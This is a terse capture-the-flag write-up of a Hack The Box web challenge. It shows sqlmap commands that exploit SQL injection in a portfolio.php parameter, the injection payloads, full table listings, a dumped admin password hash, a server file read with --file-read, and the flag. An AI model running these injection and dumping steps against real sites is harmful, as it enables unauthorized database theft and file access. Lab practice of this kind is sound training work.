docker.hackthebox.eu:30605

see source code 


fuzz directry
http://docker.hackthebox.eu:30605/administrat/
http://docker.hackthebox.eu:30605/administrat/index.php
http://docker.hackthebox.eu:30605/administrat/panel.php


/portfolio.php?id=2


http://docker.hackthebox.eu:30605/portfolio.php?id=1

sqlmap -u http://docker.hackthebox.eu:30605/portfolio.php?id=1 --dump-all

sqlmap -u http://docker.hackthebox.eu:30605/portfolio.php?id=1 --tables


_________________________________________________________________________________________________________________________________________________

sqlmap -u http://docker.hackthebox.eu:30605/portfolio.php?id=1 --tables
        ___
       __H__                                                                                                                                                          
 ___ ___[(]_____ ___ ___  {1.4.3#stable}                                                                                                                              
|_ -| . [(]     | .'| . |                                                                                                                                             
|___|_  [']_|_|_|__,|  _|                                                                                                                                             
      |_|V...       |_|   http://sqlmap.org                                                                                                                           

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:36:14 /2020-04-24/

[01:36:14] [INFO] resuming back-end DBMS 'mysql' 
[01:36:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4663=4663

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1256 FROM (SELECT(SLEEP(5)))uFfB)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707171,0x574f4a79644a59624169454a746e44476d447744784953527966654d627a6b72734c586b6b53417a,0x7178716271)-- -
---
[01:36:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:36:15] [INFO] fetching database names
[01:36:15] [INFO] fetching tables for databases: 'freelancer, information_schema, mysql, performance_schema'
Database: freelancer
[2 tables]
+----------------------------------------------------+
| portfolio                                          |
| safeadmin                                          |
+----------------------------------------------------+

Database: information_schema
[78 tables]
+----------------------------------------------------+
| ALL_PLUGINS                                        |
| APPLICABLE_ROLES                                   |
| CHANGED_PAGE_BITMAPS                               |
| CHARACTER_SETS                                     |
| CLIENT_STATISTICS                                  |
| COLLATIONS                                         |
| COLLATION_CHARACTER_SET_APPLICABILITY              |
| COLUMN_PRIVILEGES                                  |
| ENABLED_ROLES                                      |
| ENGINES                                            |
| EVENTS                                             |
| FILES                                              |
| GEOMETRY_COLUMNS                                   |
| GLOBAL_STATUS                                      |
| GLOBAL_VARIABLES                                   |
| INDEX_STATISTICS                                   |
| INNODB_BUFFER_PAGE                                 |
| INNODB_BUFFER_PAGE_LRU                             |
| INNODB_BUFFER_POOL_STATS                           |
| INNODB_CHANGED_PAGES                               |
| INNODB_CMP                                         |
| INNODB_CMPMEM                                      |
| INNODB_CMPMEM_RESET                                |
| INNODB_CMP_PER_INDEX                               |
| INNODB_CMP_PER_INDEX_RESET                         |
| INNODB_CMP_RESET                                   |
| INNODB_FT_BEING_DELETED                            |
| INNODB_FT_CONFIG                                   |
| INNODB_FT_DEFAULT_STOPWORD                         |
| INNODB_FT_DELETED                                  |
| INNODB_FT_INDEX_CACHE                              |
| INNODB_FT_INDEX_TABLE                              |
| INNODB_LOCKS                                       |
| INNODB_LOCK_WAITS                                  |
| INNODB_METRICS                                     |
| INNODB_MUTEXES                                     |
| INNODB_SYS_COLUMNS                                 |
| INNODB_SYS_DATAFILES                               |
| INNODB_SYS_FIELDS                                  |
| INNODB_SYS_FOREIGN                                 |
| INNODB_SYS_FOREIGN_COLS                            |
| INNODB_SYS_INDEXES                                 |
| INNODB_SYS_SEMAPHORE_WAITS                         |
| INNODB_SYS_TABLES                                  |
| INNODB_SYS_TABLESPACES                             |
| INNODB_SYS_TABLESTATS                              |
| INNODB_TABLESPACES_ENCRYPTION                      |
| INNODB_TABLESPACES_SCRUBBING                       |
| INNODB_TRX                                         |
| KEY_CACHES                                         |
| KEY_COLUMN_USAGE                                   |
| PARAMETERS                                         |
| PARTITIONS                                         |
| PLUGINS                                            |
| PROCESSLIST                                        |
| PROFILING                                          |
| REFERENTIAL_CONSTRAINTS                            |
| ROUTINES                                           |
| SCHEMATA                                           |
| SCHEMA_PRIVILEGES                                  |
| SESSION_STATUS                                     |
| SESSION_VARIABLES                                  |
| SPATIAL_REF_SYS                                    |
| SYSTEM_VARIABLES                                   |
| TABLESPACES                                        |
| TABLE_CONSTRAINTS                                  |
| TABLE_PRIVILEGES                                   |
| TABLE_STATISTICS                                   |
| TRIGGERS                                           |
| USER_PRIVILEGES                                    |
| USER_STATISTICS                                    |
| VIEWS                                              |
| XTRADB_INTERNAL_HASH_TABLES                        |
| XTRADB_READ_VIEW                                   |
| XTRADB_RSEG                                        |
| COLUMNS                                            |
| STATISTICS                                         |
| TABLES                                             |
+----------------------------------------------------+

Database: mysql
[30 tables]
+----------------------------------------------------+
| db                                                 |
| event                                              |
| user                                               |
| column_stats                                       |
| columns_priv                                       |
| func                                               |
| general_log                                        |
| gtid_slave_pos                                     |
| help_category                                      |
| help_keyword                                       |
| help_relation                                      |
| help_topic                                         |
| host                                               |
| index_stats                                        |
| innodb_index_stats                                 |
| innodb_table_stats                                 |
| plugin                                             |
| proc                                               |
| procs_priv                                         |
| proxies_priv                                       |
| roles_mapping                                      |
| servers                                            |
| slow_log                                           |
| table_stats                                        |
| tables_priv                                        |
| time_zone                                          |
| time_zone_leap_second                              |
| time_zone_name                                     |
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+

Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
| events_stages_history                              |
| events_stages_history_long                         |
| events_stages_summary_by_account_by_event_name     |
| events_stages_summary_by_host_by_event_name        |
| events_stages_summary_by_thread_by_event_name      |
| events_stages_summary_by_user_by_event_name        |
| events_stages_summary_global_by_event_name         |
| events_statements_current                          |
| events_statements_history                          |
| events_statements_history_long                     |
| events_statements_summary_by_account_by_event_name |
| events_statements_summary_by_digest                |
| events_statements_summary_by_host_by_event_name    |
| events_statements_summary_by_thread_by_event_name  |
| events_statements_summary_by_user_by_event_name    |
| events_statements_summary_global_by_event_name     |
| events_waits_current                               |
| events_waits_history                               |
| events_waits_history_long                          |
| events_waits_summary_by_account_by_event_name      |
| events_waits_summary_by_host_by_event_name         |
| events_waits_summary_by_instance                   |
| events_waits_summary_by_thread_by_event_name       |
| events_waits_summary_by_user_by_event_name         |
| events_waits_summary_global_by_event_name          |
| file_instances                                     |
| file_summary_by_event_name                         |
| file_summary_by_instance                           |
| host_cache                                         |
| hosts                                              |
| mutex_instances                                    |
| objects_summary_global_by_type                     |
| performance_timers                                 |
| rwlock_instances                                   |
| session_account_connect_attrs                      |
| session_connect_attrs                              |
| setup_actors                                       |
| setup_consumers                                    |
| setup_instruments                                  |
| setup_objects                                      |
| setup_timers                                       |
| socket_instances                                   |
| socket_summary_by_event_name                       |
| socket_summary_by_instance                         |
| table_io_waits_summary_by_index_usage              |
| table_io_waits_summary_by_table                    |
| table_lock_waits_summary_by_table                  |
| threads                                            |
| users                                              |
+----------------------------------------------------+

[01:36:15] [INFO] fetched data logged to text files under '/home/hasky/.sqlmap/output/docker.hackthebox.eu'

[*] ending @ 01:36:15 /2020-04-24/

[24-Apr-20 01:36:15] > 

------------------------------------------------------------------------------------------------------------------------------------------------------

sqlmap -u http://docker.hackthebox.eu:30605/portfolio.php?id=1 -T safeadmin --dump *


Database: freelancer
Table: safeadmin
[1 entry]
+------+----------+--------------------------------------------------------------+---------------------+
| id   | username | password                                                     | created_at          |
+------+----------+--------------------------------------------------------------+---------------------+
| 1    | safeadm  | $2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K | 2019-07-16 20:25:45 |
+------+----------+--------------------------------------------------------------+---------------------+

[01:38:05] [INFO] table 'freelancer.safeadmin' dumped to CSV file '/home/hasky/.sqlmap/output/docker.hackthebox.eu/dump/freelancer/safeadmin.csv'
[01:38:05] [INFO] fetched data logged to text files under '/home/hasky/.sqlmap/output/docker.hackthebox.eu'

------------------------------------------------------------------------------------------------------------------------------------------------------



http://docker.hackthebox.eu:30605/administrat/


1) sqlmap -u http://docker.hackthebox.eu:30605/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php


file contain

HTB{s4ff_3_1_w33b_fr4__l33nc_3}


2) crack the safeadmin password and login it give you flag

